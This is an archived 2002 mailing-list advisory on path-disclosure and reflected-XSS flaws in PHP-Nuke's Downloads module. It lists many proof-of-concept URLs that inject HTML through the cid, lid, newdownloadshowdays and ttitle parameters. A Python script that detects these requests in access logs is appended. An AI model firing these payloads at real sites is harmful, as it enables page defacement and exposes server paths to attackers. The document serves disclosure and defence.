PHP NUKE PATH DISCLOSURE AND XSS:

here:

http://nukesite/modules.php?name=Downloads&d_op=viewdownload&cid=%22%3E

another one:

http://nukesite/modules.php?name=Downloads&d_op=viewdownload
http://nukesite/modules.php?name=Downloads&d_op=viewdownload&%22%3E
http://nukesite/modules.php?name=Downloads&d_op=viewdownload&cid=
http://nukesite/modules.php?name=Downloads&d_op=viewdownload&cid=anything_here

older versions were also affected:

http://nukesite/download.php?op=viewdownload
http://nukesite/download.php?op=viewdownload&cid=
http://nukesite/download.php?op=viewdownload&cid=%22%3E

There is also some ** XSS **

http://nukesite/modules.php?name=Downloads&d_op=brokendownload&lid=%22%3Ch1%3EFREE%20Downloads%20with%20virus%20included!!!%3C/h1%3E

Old style:

http://nukesite/download.php?op=brokendownload&lid=%22%3Ch1%3EFREE%20Downloads%20with%20virus%20included!!!%3C/h1%3E

some more XSS:

http://nukesite/modules.php?name=Downloads&d_op=NewDownloads&newdownloadshowdays=%22%3Ch1%3E%3Cb%3EHax0r!%3C/b%3E%3C/h1%3E

Old style:

http://nukesite/download.php?op=NewDownloads&newdownloadshowdays=%22%3Ch1%3E%3Cb%3EHax0r!%3C/b%3E%3C/h1%3E

Not enough with that:

Here we have one that does both "path disclosure" and "xss"

http://nuke/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=%22%3Ch1%3ECooooooooooooool!!!!%3C/h1%3E

plus this other one:

http://nukesite/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=49&ttitle=%22%3Ch1%3EIll%20advertise%20my%20dirty%20underwear%20in%20here%3C/h6%3E

or perhaps modify both of them:

http://nukesite/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=%22%3Ch1%3E%3Cb%3Eboth%20of%20them?%3C/b%3E%3C/h1%3E&ttitle=%22%3Ch1%3E%3Cb%3Ewhy%20not%20modify%3C/b%3E%3C/h1%3E

Best Regards

--
/*
Rodrigo Gutierrez    +47 73546339
rodrigoat_private    +47 98060198
Trustix AS           http://www.trustix.com
*/
This archive was generated by hypermail 2b30 : Fri Apr 12 2002 - 10:18:43 PDT
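
An added detection example, not part of the original post: the Python below scans web-server access-log lines for requests to the Downloads entry points named in the post and flags `cid`, `lid` and `newdownloadshowdays` values that are not plain integers, a `viewdownload` request with no `cid`, and markup characters in `ttitle` or in a parameter name. It assumes those three parameters are integer-valued (the post shows `lid=49`) and a common-log-format request field; the function names and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: these parameters are integer ids/counts (the post shows lid=49).
NUMERIC_PARAMS = {"cid", "lid", "newdownloadshowdays"}
TEXT_PARAMS = {"ttitle"}  # free text; markup characters in it are suspect
MARKUP = re.compile(r'[<>"]')
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def check_request(target):
    """Return (parameter, reason) findings for one request target."""
    parts = urlsplit(target)
    pairs = parse_qsl(parts.query, keep_blank_values=True)  # also URL-decodes
    params = dict(pairs)
    legacy = parts.path.endswith("/download.php")
    modular = parts.path.endswith("/modules.php") and params.get("name") == "Downloads"
    if not (legacy or modular):
        return []
    findings = []
    op = params.get("op") if legacy else params.get("d_op")
    if op == "viewdownload" and "cid" not in params:
        findings.append(("cid", "missing"))
    for key, value in pairs:
        if key in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", value):
            findings.append((key, "non-numeric" if value else "empty"))
        elif key in TEXT_PARAMS and MARKUP.search(value):
            findings.append((key, "markup in value"))
        elif MARKUP.search(key):
            findings.append((key, "markup in parameter name"))
    return findings

def scan_log(lines):
    """Return [(line_number, findings)] for access-log lines that trip a check."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        found = check_request(match.group(1)) if match else []
        if found:
            hits.append((number, found))
    return hits

# Constructed sample lines (documentation addresses), not taken from a real log.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Apr/2002:10:00:01 +0000] "GET /modules.php?name=Downloads&d_op=viewdownload&cid=3 HTTP/1.0" 200 5120',
    '192.0.2.44 - - [12/Apr/2002:10:00:07 +0000] "GET /modules.php?name=Downloads&d_op=viewdownload&cid=%22%3E HTTP/1.0" 200 812',
    '192.0.2.44 - - [12/Apr/2002:10:00:09 +0000] "GET /download.php?op=viewdownload&cid= HTTP/1.0" 200 790',
    '192.0.2.44 - - [12/Apr/2002:10:00:12 +0000] "GET /modules.php?name=Downloads&d_op=viewdownloaddetails&lid=49&ttitle=%22%3Ch1%3Etest%3C/h1%3E HTTP/1.0" 200 6001',
    '192.0.2.10 - - [12/Apr/2002:10:00:15 +0000] "GET /modules.php?name=News&cid=abc HTTP/1.0" 200 100',
]
```

A finding marks a request for review; it does not show that the response reflected the value or disclosed a path.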